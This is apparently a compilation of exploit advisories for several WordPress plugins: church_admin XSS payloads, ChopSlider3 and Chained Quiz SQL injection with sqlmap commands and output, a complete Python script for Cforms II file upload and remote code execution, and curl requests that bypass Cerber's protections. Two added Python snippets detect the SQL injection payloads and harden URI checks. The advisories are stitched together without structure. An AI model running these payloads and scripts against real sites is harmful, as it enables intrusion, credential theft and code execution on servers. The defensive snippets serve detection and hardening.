POST /wordpress/index.php/2015/05/21/church_admin-registration-form/
save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134
GET /wordpress/index.php/2015/05/21/church_admin-directory/
<header class="entry-header">
<h1 class="entry-title">church_admin directory</h1> </header><!-- .entry-header -->
<div class="entry-content">
<p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
<div class="church_admin_name_address" >
<p><span itemprop="name"><strong>test test</strong></span></p>
<p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div><!--church_admin_name_address-->
<div class="church_admin_phone_email">
<p> <a class="email" href="tel:+3670">+3670</a><br/>
<a class="email" href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>
</p>
</div><!--church_admin_phone_email-->
3. Solution
Fixed in version 0.810.
source: https://www.securityfocus.com/bid/54329/info
The church_admin plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
church_admin plugin Version 0.33.4.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E
# Exploit Title: ChopSlider3 WordPress Plugin 3.4 - 'id' SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: N/A
# Date: 2020-05-12
# Vendor Homepage: https://idangero.us/
# Software Link: https://github.com/idangerous/Plugins
# Version: <= 3.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-11530
Description:
A blind SQL injection vulnerability is present in Chop Slider 3, in
'/wp-content/plugins/chopslider/get_script/index.php', where the 'id' parameter is concatenated straight into the query:
$cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id);
PoC:
Blind SQL injection:
GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868
SQLMap usage:
sqlmap -u 'http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3
sqlmap identified the following injection point(s) with a total of 17611 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-3097 OR 2236=2236
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1111111111 OR SLEEP(5)
---
[08:55:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
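An added detection example in Python, not part of the advisory: because get_script/index.php concatenates 'id' straight into the WHERE clause, the only legitimate value is an integer, so a log check can flag every request to that endpoint whose decoded 'id' is anything else and label the payload shapes seen in the sqlmap run above. The access-log lines and the endpoint-to-pattern logic are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory); the id values
# reuse the payload shapes the advisory and its sqlmap run show.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2020:08:55:01 +0000] "GET /wp-content/plugins/chopslider/get_script/index.php?id=3 HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2020:08:55:02 +0000] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111%20or%20(SELECT%20sleep(10))=6868 HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2020:08:55:03 +0000] "GET /wp-content/plugins/chopslider/get_script/index.php?id=-3097%20OR%202236=2236 HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2020:08:55:04 +0000] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111111+OR+SLEEP(5) HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2020:08:55:05 +0000] "GET /index.php?p=1 HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CHOPSLIDER_PATH = "/wp-content/plugins/chopslider/get_script/index.php"
INTEGER_RE = re.compile(r"^-?\d+$")
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
BOOLEAN_RE = re.compile(r"\b(or|and)\b", re.IGNORECASE)


def classify_id(value):
    """Return None for a legitimate integer id, otherwise a short reason."""
    if INTEGER_RE.match(value):
        return None
    if TIME_BASED_RE.search(value):
        return "time-based blind"
    if BOOLEAN_RE.search(value):
        return "boolean-based blind"
    return "non-integer id"


def suspicious_requests(log_text):
    """Return (decoded id, reason) for each get_script request with a non-integer id.

    parse_qs percent-decodes and turns '+' into spaces, which is what PHP's
    $_GET hands to the plugin, so the check runs on the value the query saw.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != CHOPSLIDER_PATH:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            reason = classify_id(value)
            if reason:
                hits.append((value, reason))
    return hits
```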
source: https://www.securityfocus.com/bid/54635/info
The chenpress plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
# Exploit Author: Çlirim Emini
# Website: https://www.sentry.co.com
# Software Link: https://wordpress.org/plugins/chained-quiz/
# Version/s: 1.0.8 and below
# Patched Version: 1.0.9
# CVE : N/A
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112
# Vulnerability Description:
# WordPress Plugin Chained Quiz before 1.0.9 allows remote unauthenticated
# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.
# Technical details:
# Chained Quiz appears to be vulnerable to time-based SQL injection.
# The issue lies in the $answer backend variable.
# Privileges required: None
# Proof of Concept (PoC):
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T
# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: WordPress 4.0
# CVE : CVE-2014-9473
import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser


def main():
    print 'Cforms II File Upload + Remote Code Execution\n'
    text = 'Test text'
    text_mail = 'test@mail.com'
    parser = OptionParser()
    parser.add_option("-f", "--file", dest="file", help="file to upload", default="itest.php", metavar="FILE")
    parser.add_option("-i", "--max-iterations", dest="iterations", help="Number of fields to iterate", default="10")
    parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default="10")
    parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default="")
    parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default="/wp-content/plugins/cforms2/")
    parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")
    (opt, args) = parser.parse_args()
    options = opt.__dict__
    if not opt.url:  # if url is not given
        parser.error('URL not given')
    if not opt.file:
        parser.error('file not given')
    filename = options["file"]
    if os.path.isfile(filename) is not True:
        print 'No such file ' + filename
        return 0
    url = options['url']
    home = options["home"]
    i = options["iterations"]
    n = options["number"]
    b = options["brute"]
    s = requests.Session()
    r = s.get(url)
    if r.status_code != requests.codes.ok:
        print 'Error: website not found.'
        return 0
    tree = etree.HTML(r.text)
    # get cforms id: look for the form element cforms<N>form when -n was not given
    if n == "":
        for x in xrange(2, 10):
            for node in tree.xpath('//*[@id="cforms' + str(x) + 'form"]'):
                if node is not None:
                    n = str(x)
                    break
    print 'Cforms form number is <' + n + '>'
    hidden = ['cf_working' + n, 'cf_failure' + n, 'cf_codeerr' + n, 'cf_customerr' + n, 'cf_popup' + n]
    fields = ['cf' + n + '_field_' + str(x) for x in xrange(1, int(i) + 1)]
    required = {'sendbutton' + n: '1'}
    # fill every required field so the form validates; the class attribute may be absent
    for f in fields:
        for node in tree.xpath('//*[@id="' + f + '"]'):
            if node is not None:
                classes = node.get('class') or ''
                if 'fldrequired' in classes:
                    if 'fldemail' in classes:
                        required[f] = text_mail
                    else:
                        required[f] = text
    # copy the hidden state fields the form expects back
    for h in hidden:
        for node in tree.xpath('//*[@id="' + h + '"]'):
            if node is not None:
                required[h] = node.get('value')
    for node in tree.xpath('//*[@id="cforms_captcha' + n + '"]'):
        if node is not None:
            print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
            return 0
    files = {'cf_uploadfile' + n + '[]': ('wow.php', open(filename, 'rb'))}
    r = s.post(url, data=required, files=files)
    if r.status_code != requests.codes.ok:
        print 'Error: post error.'
        print r.status_code
        return 0
    else:
        # the plugin prefixes the stored name; try the unprefixed form first, then a numeric prefix
        url1 = url + home + 'noid-wow.php'
        flag = 0
        if s.get(url1).status_code != requests.codes.ok:
            for l in xrange(1, int(b)):
                url1 = url + home + str(l) + '-wow.php'
                print url1
                if s.get(url1).status_code == requests.codes.ok:
                    flag = 1
                    break
        else:
            flag = 1
        if flag == 1:
            print "Success! Uploaded file: " + url1
        else:
            print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"


main()
# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
You can bypass the user enumeration protection by using the POST method instead of GET.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
You can bypass the admin scripts protection by adding one or more slashes to the URI.
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
#3: Protect wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
You can bypass this protection by percent-encoding any character in the URI.
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
#4: Hide login URL bypass:
You can bypass this by percent-encoding any character in the URI; Cerber will then return the secret slug in the Location header field.
curl -I http://localhost/wp-%61dmin/
#5: Stop user enumeration via REST API bypass:
You can bypass this by inserting /index.php/ between the domain and the REST route.
curl http://localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same as above.
curl http://localhost/index.php/wp-json/wp/v2/
--ed0x21son
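An added defensive example in Python, not the plugin's own code: bypasses #2 to #6 share one root cause, a filter that compares the raw request URI against its list of protected paths without first decoding and normalising it. The canonicalisation below closes all of them at once; the protected-path list and the /index.php/ front-controller handling are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

# Paths the advisory says Cerber protects, plus /wp-admin (whose redirect leaks
# the hidden login slug in #4). Constructed list for this example.
PROTECTED_PATHS = {
    "/wp-admin", "/wp-admin/load-scripts.php", "/wp-admin/load-styles.php",
    "/wp-login.php", "/wp-signup.php", "/wp-register.php",
}
REST_PREFIX = "/wp-json/"


def canonical_path(uri):
    """Normalise a request URI before comparing it with the protected list.

    Percent-decoding repeats until stable so double encoding (%252e) still
    resolves; duplicate slashes and '.'/'..' segments are collapsed; a leading
    /index.php/ front-controller prefix is dropped. Over-matching is the safe
    direction for a protective filter, so decoding more than once is fine.
    """
    path = uri.split("?", 1)[0]
    previous = None
    while path != previous:
        previous, path = path, unquote(path)
    path = posixpath.normpath("/" + path.lstrip("/"))
    if path.startswith("/index.php/"):
        path = path[len("/index.php"):]
    return path


def naive_is_protected(uri):
    """Literal comparison on the raw URI: every bypass below slips past it."""
    path = uri.split("?", 1)[0]
    return path in PROTECTED_PATHS or path.startswith(REST_PREFIX)


def hardened_is_protected(uri):
    """The same rule applied after canonicalisation."""
    path = canonical_path(uri)
    return path in PROTECTED_PATHS or path.startswith(REST_PREFIX)


# Request targets from bypasses #2 to #6 above (host stripped). #1 is a method
# check (POST instead of GET), which path canonicalisation cannot express.
BYPASSES = [
    "/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils",
    "/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar",
    "/wp-login%2ephp", "/wp-signup%2ephp", "/wp-register%2ephp",
    "/wp-%61dmin/",
    "/index.php/wp-json/wp/v2/users/", "/index.php/wp-json/wp/v2/",
]
```

The decode-then-normalise-then-compare order matters: matching before decoding, or collapsing slashes after matching, leaves each of the listed request forms unrecognised.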